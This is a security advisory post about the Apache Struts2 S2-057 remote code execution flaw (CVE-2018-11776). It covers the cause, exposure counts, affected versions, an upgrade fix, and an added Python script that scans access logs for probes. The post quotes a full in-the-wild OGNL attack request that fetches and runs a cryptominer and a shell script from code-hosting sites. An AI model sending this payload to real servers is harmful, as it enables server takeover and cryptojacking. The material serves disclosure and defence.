
white hat safety research institute

Posted by truschel at 2020-02-27

On August 22, 2018 (Beijing time), the official Struts 2 website announced a new remote command execution vulnerability, numbered S2-057. This vulnerability may allow an attacker to escalate privileges and take control of the server. Since Struts 2 is widely deployed, including by domestic government bodies and large enterprises, please update to the latest version or apply protective measures promptly.

Struts 2 is a web application framework based on the MVC design pattern that has matured into a very stable framework. A large number of websites worldwide are built on it, many of them operated by governments and large enterprises.

A total of 281021 Struts2 instances are exposed to the Internet worldwide. The United States has the most, with 78459; China is second with 65216; South Korea is third with 52421; Ireland is fourth with 12944; Uruguay is fifth with 12927. Within China, Beijing has the most, with 15471; Zhejiang Province is second with 15249; Guangdong Province is third with 5159; Shanghai is fourth with 3564; Jiangsu Province is fifth with 3292.

Global distribution (distribution only, not vulnerability impact)

Distribution in China (only distribution, not vulnerability impact)

Vulnerability principle and impact

If no namespace is set for an action in the Struts2 application's configuration file (which file this is depends on the application), or a wildcard namespace is used in the action configuration, remote code execution becomes possible. The same applies when the url tag's value and action attributes are not set in the configuration and no namespace (or a wildcard namespace) is configured. The attack points of the vulnerability are the redirect action result, action chaining and the postback result, all three of which are Struts 2 forwarding modes; an attacker can deliver the payload through any of these three result types.

The vulnerability is severe: any attacker who can reach the application may execute arbitrary commands remotely, leading to server compromise. Because the wildcard namespace feature is disabled, exploitation is subject to some limitations in real-world scenarios.

In the figure below, we append the expression ${999 + 999} to the URL. After the request, the application redirects to the address 1998, which proves that the expression was evaluated.

S2-057 vulnerability verification

S2-057 vulnerability detection script

According to recent observations by Baimaohui, there have already been cases of cryptomining and scanning carried out with the POC. The attacker uses the following attack code:

GET /struts3-showcase/$${(#_memberAccess[“allowStaticMethodAccess”]=true,#[email protected]@getRuntime().exec(‘wget -O xrig hxxps://github.com/cnrig/cnrig/releases/download/v0.1.5-release/cnrig-0.1.5-linux-x86_64;wget hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh || curl -L hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh –output upcheck.sh;chmod x xrig;chmod x upcheck.sh;nohup ./upcheck.sh &;nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner -p x &;rm xrig’).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#[email protected]@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action HTTP/1.1

The attacker uses the above code to spread a cryptomining trojan and carry out mining. The program is distributed through two code-hosting platforms, github.com and bitbucket.org, which serve as the delivery medium.
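To spot this kind of traffic in web server access logs, here is an added detection example (not part of the original post) that flags requests carrying an OGNL expression in the namespace portion of an .action URL, which is where S2-057 payloads land; the log lines are constructed samples, and the benign look-alikes show what the rule deliberately does not flag.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the original post). The two
# attack lines mirror the shape of the request quoted above, with the OGNL body
# cut down to a harmless expression; the last two lines are benign look-alikes.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Aug/2018:10:01:02 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 5120
203.0.113.7 - - [22/Aug/2018:10:01:09 +0000] "GET /struts2-showcase/${999+999}/actionChain1.action HTTP/1.1" 302 0
203.0.113.9 - - [22/Aug/2018:10:02:41 +0000] "GET /struts2-showcase/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%29%7D/actionChain1.action HTTP/1.1" 302 0
198.51.100.2 - - [22/Aug/2018:10:03:00 +0000] "GET /docs/pricing.html?ref=${campaign} HTTP/1.1" 200 800
198.51.100.4 - - [22/Aug/2018:10:03:15 +0000] "GET /struts2-showcase/index.action?name=%24%7Bx%7D HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
OGNL_MARKER = re.compile(r"[$%]\{")  # start of a ${...} or %{...} OGNL expression

def decoded_path(request_target: str) -> str:
    """Strip the query string and URL-decode twice to catch double-encoded payloads."""
    return unquote(unquote(request_target.split("?", 1)[0]))

def is_s2_057_probe(request_target: str) -> bool:
    """True when an OGNL expression sits in the namespace part of an action URL.

    S2-057 evaluates OGNL found in the namespace (the path segments before the
    action name) of a redirectAction, chain or postback result. An expression in
    the query string, or in a URL that is not an action, is not this bug, so
    those cases are deliberately left unflagged to keep the rule precise.
    """
    path = decoded_path(request_target)
    if not path.endswith(".action"):
        return False
    namespace = path.rsplit("/", 1)[0]
    return OGNL_MARKER.search(namespace) is not None

def find_s2_057_probes(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded_path) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_s2_057_probe(match.group("target")):
            hits.append((line.split(" ", 1)[0], decoded_path(match.group("target"))))
    return hits

if __name__ == "__main__":
    for client_ip, path in find_s2_057_probes(SAMPLE_LOG):
        print(f"possible S2-057 probe from {client_ip}: {path}")
```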

Vulnerability impact

The affected versions are Struts 2.3 through 2.3.34 and Struts 2.5 through 2.5.16. Other versions may also be affected.

Vulnerability POC

The POC has been added to the FOFA client; you can view it there or follow this link later (https://nosec.org/home/detail/1755.html).

CVE number

CVE-2018-11776

Remediation recommendations

1. The vulnerability has been fixed in the official new releases. It is recommended to upgrade directly to Apache Struts 2.3.35 or 2.5.17. The official download address is https://archive.apache.org/dist/struts/
